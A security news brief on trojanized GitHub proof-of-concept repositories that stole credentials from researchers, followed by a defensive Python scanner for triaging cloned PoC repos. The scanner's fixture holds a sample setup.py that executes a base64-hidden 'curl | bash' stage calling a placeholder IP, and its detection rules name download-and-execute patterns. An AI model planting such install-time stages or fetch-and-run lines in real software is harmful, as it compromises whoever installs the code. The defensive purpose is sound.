Nearly 400,000 WordPress credentials stolen
Briefly

Targeting red teamers and security researchers with fake PoCs is a troll technique as old as security research itself. As this attack demonstrates, it is also an effective watering-hole technique. It is a good reminder for those who provide offensive security services that they themselves are part of an exploitable supply chain, and that attackers know this.
Attackers set up dozens of GitHub repositories with fake proof-of-concept exploits. Victims, among them security professionals, red teamers and other threat actors, unknowingly ran malicious second-stage payloads that stole credentials and keys. In parallel, a phishing campaign tricked targets into installing a fake kernel update. The trojanized repos looked legitimate, often appearing in trusted threat intelligence feeds, so by downloading and running the code, victims essentially infected themselves.
The campaign used two delivery channels. Trojanized GitHub repositories posed as legitimate proof-of-concept exploits and lured security professionals into downloading and running them; the phishing campaign delivered the same kind of malware disguised as a CPU update, adding a second initial-access vector alongside the repos.
This supply chain attack compromised the normal software acquisition process. Instead of attacking targets directly, the attackers poisoned the sources victims relied on to obtain tools and exploits.
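The practical check a reader of this story wants is a way to triage a cloned PoC repository before running anything in it. The script below is an added example, not code from the article or from the campaign it describes. Its rule set is a generic, assumed set of trojan signals (install-time hooks such as setup.py, eval/exec, base64 decoding, download-and-execute one-liners, embedded binaries), and the sample repository it scans is constructed inline for demonstration; the 203.0.113.5 address is an RFC 5737 documentation IP, not an indicator from the real campaign. The key design point is that a hit in a file that runs at install or build time is ranked above a hit in the exploit script itself, because a second stage hidden in setup.py fires even if the "exploit" is never invoked.

```python
"""Triage a downloaded proof-of-concept repository before executing anything in it.
Added example; heuristic only. A clean report is not proof that a repo is safe."""
import base64
import binascii
import os
import re
import tempfile
from dataclasses import dataclass

# Files whose code runs at install or build time, before the PoC itself is ever invoked.
# (Assumed list; extend for the ecosystems you actually pull PoCs from.)
INSTALL_HOOKS = {"setup.py", "setup.cfg", "pyproject.toml", "Makefile", "CMakeLists.txt",
                 "package.json", "build.sh", "install.sh", "configure"}

# Generic trojan signals. Legitimate PoCs trip some of these too (e.g. subprocess in the
# exploit), which is why install-hook findings are reported separately from runtime ones.
RULES = {
    "download_and_exec": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z|da|k)?sh\b"),
    "dynamic_exec":      re.compile(r"\b(exec|eval)\s*\("),
    "base64_decode":     re.compile(r"b64decode\s*\(|\bbase64\s+(-d|--decode)\b"),
    "shell_from_code":   re.compile(r"\bos\.system\s*\(|\bsubprocess\.(Popen|run|call|check_output)\s*\("),
    "long_base64_blob":  re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}


@dataclass(frozen=True)
class Finding:
    path: str             # path relative to the repository root
    line: int             # 1-based line number; 0 for whole-file findings
    rule: str             # rule name, prefixed "decoded:" when hit inside a decoded blob
    runs_on_install: bool


def _decode_blob(blob: str):
    """Return the blob's plaintext if it is valid base64 of printable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def scan_text(rel_path, text, on_install, prefix="", fixed_line=None):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        report_line = fixed_line if fixed_line is not None else lineno
        for name, pattern in RULES.items():
            if name == "long_base64_blob" and prefix:
                continue  # decode one level only; do not chase blobs inside decoded text
            m = pattern.search(line)
            if not m:
                continue
            findings.append(Finding(rel_path, report_line, prefix + name, on_install))
            if name == "long_base64_blob":
                decoded = _decode_blob(m.group(0))
                if decoded:
                    # Re-scan the decoded payload: this is where curl|bash usually hides.
                    findings.extend(scan_text(rel_path, decoded, on_install,
                                              prefix="decoded:", fixed_line=report_line))
    return findings


def scan_repo(root):
    """Walk a checked-out repository and return all findings, install-time hits first."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for fname in filenames:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root)
            on_install = fname in INSTALL_HOOKS
            with open(full, "rb") as fh:
                raw = fh.read()
            if b"\x00" in raw[:8192]:
                # A prebuilt binary in a "source" PoC cannot be reviewed; flag it and move on.
                findings.append(Finding(rel, 0, "embedded_binary", on_install))
                continue
            findings.extend(scan_text(rel, raw.decode("utf-8", errors="replace"), on_install))
    return sorted(findings, key=lambda f: (not f.runs_on_install, f.path, f.line))


# Constructed sample repository (not a real artefact): a plausible exploit script next to a
# setup.py that decodes and executes a hidden download-and-run stage, plus a stray binary.
STAGE2 = 'import os\nos.system("curl -fsSL http://203.0.113.5/s.sh | bash")\n'
SAMPLE_FILES = {
    "README.md": "# PoC\n\nUsage: python3 exploit.py <target>\n",
    "exploit.py": "import socket\nimport subprocess\n\ndef trigger(host):\n"
                  "    s = socket.create_connection((host, 8080))\n    s.sendall(b'A' * 4096)\n"
                  "    return subprocess.run(['id'], capture_output=True)\n",
    "setup.py": "from setuptools import setup\nimport base64\npayload = \"%s\"\n"
                "exec(base64.b64decode(payload))\nsetup(name='poc', version='0.1')\n"
                % base64.b64encode(STAGE2.encode()).decode(),
    "bin/helper": b"\x7fELF\x02\x01\x01" + b"\x00" * 16,
}


def build_sample_repo():
    root = tempfile.mkdtemp(prefix="poc-triage-")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content if isinstance(content, bytes) else content.encode())
    return root


def rules_hit(findings, path):
    """Sorted set of rule names that fired for one file; convenient for tests and summaries."""
    return sorted({f.rule for f in findings if f.path == path})


if __name__ == "__main__":
    for f in scan_repo(build_sample_repo()):
        print(f"[{'INSTALL-TIME' if f.runs_on_install else 'runtime'}] {f.path}:{f.line} {f.rule}")
```

Run it against a real clone with `scan_repo("/path/to/clone")`. On the constructed sample it reports setup.py first, with the base64 blob, the exec/decode calls, and the curl|bash found inside the decoded payload, then the subprocess call in exploit.py as a lower-priority runtime finding, and the ELF stub under bin/ as an unreviewable binary. Treat any install-time finding as a stop: read the decoded payload before you touch the repo, ideally in a throwaway VM with no credentials or SSH keys on it.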
Read at Securitymagazine